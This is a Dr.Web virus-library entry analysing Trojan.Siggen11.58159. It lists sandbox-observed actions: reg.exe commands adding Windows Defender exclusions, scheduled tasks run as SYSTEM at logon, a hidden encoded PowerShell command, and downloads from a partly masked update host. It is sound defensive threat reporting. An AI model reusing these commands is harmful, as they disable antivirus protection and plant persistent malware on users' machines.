ПОЛЬЗОВАТЕЛЯМ

Закрыть

Поиск

Поиск

Поддержка
Круглосуточная поддержка

Напишите

Запрос через форму

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Напишите

Задать вопрос в поддержку

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

BY

RU CN DE EN ES FR IT JP KZ UZ PL BY ID
Закрыть
Сервисы
Сканеры
Dr.Web vxCube
Демо
Вирусная библиотека
База знаний

Технологии

Термины

Обучение и просвещение

Мифы

Новости

Trojan.Siggen11.58159

Добавлен в вирусную базу Dr.Web: 2021-01-12

Описание добавлено:

Technical Information

To ensure autorun and distribution
Creates or modifies the following files
  • <SYSTEM32>\tasks\gusikjcxd
Malicious functions
To complicate detection of its presence in the operating system,
adds antivirus exclusion with following registry keys:
  • [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\LgcTNBcqQPlcodRnApR' = '0'
  • [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\LgcTNBcqQPlcodRnApR' = '00000000'
  • [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\TnjQjowBU' = '00000000'
  • [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\TnjQjowBU' = '00000000'
  • [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\bhqBkEsJVojqC' = '00000000'
  • [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\kTfFAHiiclUn' = '00000000'
  • [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\bhqBkEsJVojqC' = '00000000'
  • [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\snVDkQQcQausoZMVI' = '00000000'
  • [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\LgcTNBcqQPlcodRnApR' = '00000000'
  • [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\kTfFAHiiclUn' = '00000000'
  • [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\ypJYDLDaGTvU2' = '00000000'
  • [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ALLUSERSPROFILE%\IrwTVgASkKwmEDVB' = '00000000'
  • [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\ypJYDLDaGTvU2' = '00000000'
  • [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ALLUSERSPROFILE%\IrwTVgASkKwmEDVB' = '00000000'
  • [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%LOCALAPPDATA%Low\zViIoQpHNdxIS' = '00000000'
  • [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%LOCALAPPDATA%Low\zViIoQpHNdxIS' = '00000000'
  • [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\vGVMsIQpaIE' = '00000000'
  • [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\vGVMsIQpaIE' = '00000000'
  • [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%LOCALAPPDATA%Low\zViIoQpHNdxIS' = '00000000'
  • [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ALLUSERSPROFILE%\IrwTVgASkKwmEDVB' = '00000000'
  • [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\ypJYDLDaGTvU2' = '00000000'
  • [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\bhqBkEsJVojqC' = '0'
  • [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\kTfFAHiiclUn' = '0'
  • [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\vGVMsIQpaIE' = '0'
  • [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\ypJYDLDaGTvU2' = '0'
  • [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ALLUSERSPROFILE%\IrwTVgASkKwmEDVB' = '0'
  • [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%LOCALAPPDATA%Low\zViIoQpHNdxIS' = '0'
  • [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\snVDkQQcQausoZMVI' = '0'
  • [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\TnjQjowBU' = '0'
  • [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\YLQHmdNDdZUGobZP' = '0'
  • [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\YLQHmdNDdZUGobZP' = '00000000'
  • [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\YLQHmdNDdZUGobZP' = '00000000'
  • [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\LgcTNBcqQPlcodRnApR' = '00000000'
  • [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\TnjQjowBU' = '00000000'
  • [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\bhqBkEsJVojqC' = '00000000'
  • [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\kTfFAHiiclUn' = '00000000'
  • [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\vGVMsIQpaIE' = '00000000'
  • [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\YLQHmdNDdZUGobZP' = '00000000'
  • [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\snVDkQQcQausoZMVI' = '00000000'
  • [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\snVDkQQcQausoZMVI' = '00000000'
Creates and executes the following
  • '%WINDIR%\temp\lpseagwbjuvhanir\rmrfbv.exe' /S /UPDATE
Modifies file system
Creates the following files
  • %WINDIR%\temp\lpseagwbjuvhanir\rmrfbv.exe
  • %WINDIR%\temp\ylqhmdnddzugobzp\tralkxkg\gnunxyjpyoowxjzj.wsf
Deletes the following files
  • <SYSTEM32>\tasks\gusikjcxd
  • %WINDIR%\temp\ylqhmdnddzugobzp\tralkxkg\gnunxyjpyoowxjzj.wsf
Substitutes the following files
  • %ALLUSERSPROFILE%\ntuser.pol
  • %HOMEPATH%\ntuser.pol
Network activity
TCP
HTTP GET requests
  • http://www.te###pdate.info/updates/yd/yt_e_b_22/win/version.txt
  • http://www.te###pdate.info/updates/yd/yt_e_b_22/win/update_e.jpg
UDP
  • DNS ASK te###pdate.info
Miscellaneous
Creates and executes the following
  • '%WINDIR%\syswow64\wscript.exe' "%WINDIR%\Temp\YLQHmdNDdZUGobZP\TraLKXkg\gNUnXyjpyoOWxjZJ.wsf"
  • '<SYSTEM32>\gpupdate.exe' /force' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==' (with hidden window)
Executes the following
  • '%WINDIR%\syswow64\schtasks.exe' /CREATE /TN "gUsiKjcxd" /SC once /ST 01:08:24 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZ...
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "QXQQuhaKPQvnJkd"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "QXQQuhaKPQvnJkd"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "QXQQuhaKPQvnJkd2"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "QXQQuhaKPQvnJkd2"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "WBwxbNDcPVufxEN"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "WBwxbNDcPVufxEN"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "WBwxbNDcPVufxEN2"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "WBwxbNDcPVufxEN2"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "kEiQuSyCxSNSXLj"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "kEiQuSyCxSNSXLj"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "kEiQuSyCxSNSXLj2"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "DeyymvjKjosDeHR2"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "DeyymvjKjosDeHR2"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "kEiQuSyCxSNSXLj2"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "HvsMDOtiOXPqbst2"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "HvsMDOtiOXPqbst2"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "VTQzUsVDJvsJUIu"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "VTQzUsVDJvsJUIu"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "VTQzUsVDJvsJUIu2"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "VTQzUsVDJvsJUIu2"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "jreeZwyuSkXbDsT"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "jreeZwyuSkXbDsT"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "jreeZwyuSkXbDsT2"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "jreeZwyuSkXbDsT2"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "VpKQJEDmfrgyxgM"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "HvsMDOtiOXPqbst"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "HvsMDOtiOXPqbst"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "VpKQJEDmfrgyxgM2"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "VpKQJEDmfrgyxgM"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "nQQBNhbiwOzRggs2"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "yFrmAisNLtOejzFdhPf"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "yFrmAisNLtOejzFdhPf"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "yFrmAisNLtOejzFdhPf2"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "yFrmAisNLtOejzFdhPf2"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "HlPxJqBuAxUwyRemcvQ"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "HlPxJqBuAxUwyRemcvQ"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "HlPxJqBuAxUwyRemcvQ2"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "HlPxJqBuAxUwyRemcvQ2"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "kYoZrQoiTYIPvlSUVOU"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "kYoZrQoiTYIPvlSUVOU"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "DeyymvjKjosDeHR"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "EVWqfNWPUDiaqHaTTsp2"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "DeyymvjKjosDeHR"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "kYoZrQoiTYIPvlSUVOU2"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "SCRtOEmFybwRmdEnSiQ2"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "SCRtOEmFybwRmdEnSiQ2"
  • '%WINDIR%\syswow64\schtasks.exe' /CREATE /TR "rundll32 \"%ProgramFiles(x86)%\TnjQjowBU\mtGJnq.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "kpxdvoEFVArzXTb" /V1 /F
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "MLQtnlyHrTCTEQp"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "MLQtnlyHrTCTEQp"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "MLQtnlyHrTCTEQp2"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "MLQtnlyHrTCTEQp2"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "nQQBNhbiwOzRggs"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "nQQBNhbiwOzRggs"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "nQQBNhbiwOzRggs2"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "kYoZrQoiTYIPvlSUVOU2"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "SCRtOEmFybwRmdEnSiQ"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "SCRtOEmFybwRmdEnSiQ"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "BCwHabCCSHPfAsOTU2"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "VpKQJEDmfrgyxgM2"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "uvRKiKGBzKejC"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "uvRKiKGBzKejC2"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "uvRKiKGBzKejC2"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "WbeIrLiEPkwKF"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "WbeIrLiEPkwKF"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "WbeIrLiEPkwKF2"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "WbeIrLiEPkwKF2"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "DnPkhfhelvJqo"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "DnPkhfhelvJqo"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "DnPkhfhelvJqo2"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "DnPkhfhelvJqo2"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "qQChbDnwcsvKn2"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "dcSZiLxDzKviT"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "uvRKiKGBzKejC"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "dcSZiLxDzKviT2"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "XihtzLHDKzhCe"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "XihtzLHDKzhCe"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "XihtzLHDKzhCe2"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "XihtzLHDKzhCe2"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "OGwaqanMhRcgK"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "OGwaqanMhRcgK"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "OGwaqanMhRcgK2"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "OGwaqanMhRcgK2"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "BhHKeSiJpQFoa"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "BhHKeSiJpQFoa"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "dcSZiLxDzKviT"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "qQChbDnwcsvKn2"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "dcSZiLxDzKviT2"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "qQChbDnwcsvKn"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "qQChbDnwcsvKn"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "iKcIoErIoYBmad"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "tdAvuUXuYJiIuP"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "UabibrcLvzsMxp"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "UabibrcLvzsMxp"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "dINvmaXnOOEaSx"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "dINvmaXnOOEaSx"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "wkIugyAIjAJyPW"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "wkIugyAIjAJyPW"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "xpcikrhAughMbu"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "xpcikrhAughMbu"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "iVceWolTUIgOEK"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "iVceWolTUIgOEK"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "spJqxPoFnsiyLq"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "tdAvuUXuYJiIuP"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "spJqxPoFnsiyLq"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "tIrXQsHDmJPXiF"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "NrVFyNBuqVyHBr"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "NrVFyNBuqVyHBr"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "CTGAPMPAkKEyh"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "CTGAPMPAkKEyh"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "CTGAPMPAkKEyh2"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "CTGAPMPAkKEyh2"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "pyhZIvSPpDmdo"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "pyhZIvSPpDmdo"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "pyhZIvSPpDmdo2"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "pyhZIvSPpDmdo2"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "EVWqfNWPUDiaqHaTTsp"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "tIrXQsHDmJPXiF"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "EVWqfNWPUDiaqHaTTsp2"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "EVWqfNWPUDiaqHaTTsp"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "kdpAGtrckdwHDCnJoAD2"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "kdpAGtrckdwHDCnJoAD2"
  • '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\snVDkQQcQausoZMVI" /t REG_DWORD /d 0 /reg:64
  • '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\LgcTNBcqQPlcodRnApR" /t REG_DWORD /d 0 /reg:32
  • '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\LgcTNBcqQPlcodRnApR" /t REG_DWORD /d 0 /reg:64
  • '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\TnjQjowBU" /t REG_DWORD /d 0 /reg:32
  • '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\TnjQjowBU" /t REG_DWORD /d 0 /reg:64
  • '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\bhqBkEsJVojqC" /t REG_DWORD /d 0 /reg:32
  • '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\bhqBkEsJVojqC" /t REG_DWORD /d 0 /reg:64
  • '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\kTfFAHiiclUn" /t REG_DWORD /d 0 /reg:32
  • '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\kTfFAHiiclUn" /t REG_DWORD /d 0 /reg:64
  • '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\vGVMsIQpaIE" /t REG_DWORD /d 0 /reg:32
  • '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%Low\zViIoQpHNdxIS" /t REG_DWORD /d 0 /reg:32
  • '<SYSTEM32>\raserver.exe' /offerraupdate
  • '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\snVDkQQcQausoZMVI" /t REG_DWORD /d 0 /reg:32
  • '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\vGVMsIQpaIE" /t REG_DWORD /d 0 /reg:64
  • '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ALLUSERSPROFILE%\IrwTVgASkKwmEDVB" /t REG_DWORD /d 0 /reg:64
  • '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%Low\zViIoQpHNdxIS" /t REG_DWORD /d 0 /reg:32
  • '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%Low\zViIoQpHNdxIS" /t REG_DWORD /d 0 /reg:64
  • '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\snVDkQQcQausoZMVI" /t REG_DWORD /d 0 /reg:32
  • '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\snVDkQQcQausoZMVI" /t REG_DWORD /d 0 /reg:64
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "bEGkKbBSQjGVFfwog"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "bEGkKbBSQjGVFfwog"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "bEGkKbBSQjGVFfwog2"
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "bEGkKbBSQjGVFfwog2"
  • '%WINDIR%\syswow64\schtasks.exe' /END /TN "BCwHabCCSHPfAsOTU"
  • '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\ypJYDLDaGTvU2" /t REG_DWORD /d 0 /reg:32
  • '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\ypJYDLDaGTvU2" /t REG_DWORD /d 0 /reg:64
  • '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ALLUSERSPROFILE%\IrwTVgASkKwmEDVB" /t REG_DWORD /d 0 /reg:32
  • '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ALLUSERSPROFILE%\IrwTVgASkKwmEDVB" /t REG_DWORD /d 0 /reg:64
  • '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ALLUSERSPROFILE%\IrwTVgASkKwmEDVB" /t REG_DWORD /d 0 /reg:32
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "BCwHabCCSHPfAsOTU"
  • '<SYSTEM32>\taskeng.exe' {435087D7-0BBA-477F-AE11-1F4390E59421} S-1-5-21-1960123792-2022915161-3775307078-1001:aipvclbz\user:Interactive:[1]
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  • '<SYSTEM32>\gpupdate.exe' /force
  • '<SYSTEM32>\gpscript.exe' /RefreshSystemParam
  • '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "gUsiKjcxd"
  • '%WINDIR%\syswow64\cmd.exe' /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\YLQHmdNDdZUGobZP" /t REG_DWORD /d 0 /reg:32
  • '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\YLQHmdNDdZUGobZP" /t REG_DWORD /d 0 /reg:32
  • '%WINDIR%\syswow64\cmd.exe' /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\YLQHmdNDdZUGobZP" /t REG_DWORD /d 0 /reg:64
  • '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\YLQHmdNDdZUGobZP" /t REG_DWORD /d 0 /reg:64
  • '%WINDIR%\syswow64\cmd.exe' /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\YLQHmdNDdZUGobZP" /t REG_DWORD /d 0 /reg:32
  • '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\YLQHmdNDdZUGobZP" /t REG_DWORD /d 0 /reg:32
  • '%WINDIR%\syswow64\cmd.exe' /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\YLQHmdNDdZUGobZP" /t REG_DWORD /d 0 /reg:64
